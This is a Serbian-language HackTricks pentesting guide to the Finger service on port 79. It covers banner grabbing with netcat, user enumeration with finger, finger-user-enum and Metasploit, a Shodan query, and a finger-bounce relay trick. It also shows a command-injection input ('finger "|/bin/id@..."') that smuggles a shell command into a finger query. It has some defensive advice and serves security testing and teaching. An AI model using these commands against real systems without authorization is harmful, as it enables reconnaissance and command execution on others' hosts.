hacktricks/network-services-pentesting/pentesting-finger.md
2024-02-10 13:11:20 +00:00

102 lines
6 KiB
Markdown

# 79 - Pentesting Finger
<details>
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Drugi načini podrške HackTricks-u:
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
## **Osnovne informacije**
Program/servis **Finger** se koristi za dobijanje detalja o korisnicima računara. Tipično, pružene informacije uključuju **korisničko ime, puno ime** i, u nekim slučajevima, dodatne detalje. Ovi dodatni detalji mogu obuhvatati lokaciju kancelarije i broj telefona (ako je dostupan), vreme kada se korisnik prijavio, period neaktivnosti (vreme mirovanja), poslednji put kada je korisnik pročitao poštu, i sadržaj korisnikovih planova i projektnih fajlova.
**Podrazumevani port:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Enumeracija**
### **Banner Grabbing/Osnovna konekcija**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Enumeracija korisnika**
User enumeration (enumeracija korisnika) je proces identifikacije validnih korisničkih imena na ciljnom sistemu. Ova tehnika se često koristi u fazi pripreme za napad, kako bi se prikupile informacije o korisnicima i njihovim nalozima. Enumeracija korisnika može biti korisna za dalje napade kao što su brute force napadi na lozinke ili ciljano usmereni napadi na određene korisnike.
#### **Metode enumeracije korisnika**
Postoji nekoliko metoda koje se mogu koristiti za enumeraciju korisnika:
1. **Finger service (Finger servis)**: Finger servis je protokol koji omogućava korisnicima da dobiju informacije o drugim korisnicima na sistemu. Korišćenjem finger servisa, napadač može dobiti listu korisničkih imena na ciljnom sistemu.
2. **Usernames guessing (Pogađanje korisničkih imena)**: Napadač može pokušati da pogađa korisnička imena na ciljnom sistemu na osnovu uobičajenih obrazaca ili pretpostavki. Na primer, napadač može pokušati sa uobičajenim korisničkim imenima kao što su "admin", "root" ili kombinacijama imena i prezimena.
3. **Email harvesting (Sakupljanje email adresa)**: Napadač može sakupljati email adrese sa ciljnog sistema kako bi identifikovao korisnička imena. Ovo se može postići skeniranjem web stranica, pretraživanjem javnih baza podataka ili korišćenjem drugih tehnika za prikupljanje email adresa.
4. **Social engineering (Socijalno inženjerstvo)**: Napadač može koristiti socijalno inženjerstvo kako bi dobio informacije o korisnicima i njihovim korisničkim imenima. Ovo može uključivati manipulaciju ljudima putem telefonskih poziva, phishing napada ili drugih tehnika manipulacije.
#### **Prevencija enumeracije korisnika**
Da bi se sprečila enumeracija korisnika, preporučuje se preduzimanje sledećih mera:
- Onemogućiti finger servis ili ograničiti pristup samo određenim korisnicima.
- Koristiti jaka i jedinstvena korisnička imena koja su teška za pogoditi.
- Implementirati mehanizme za sprečavanje brute force napada na lozinke.
- Edukovati korisnike o socijalnom inženjerstvu i phishing napadima kako bi bili svesni potencijalnih pretnji.
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Alternativno, možete koristiti **finger-user-enum** sa [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), neki primeri:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap izvršava skriptu za korišćenje podrazumevanih skripti**
### Metasploit koristi više trikova od Nmap-a
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
* `port:79 USER`
## Izvršavanje komande
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Finger Bounce
[Koristite sistem kao preusmerivač prstiju](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
<details>
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Drugi načini podrške HackTricks-u:
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>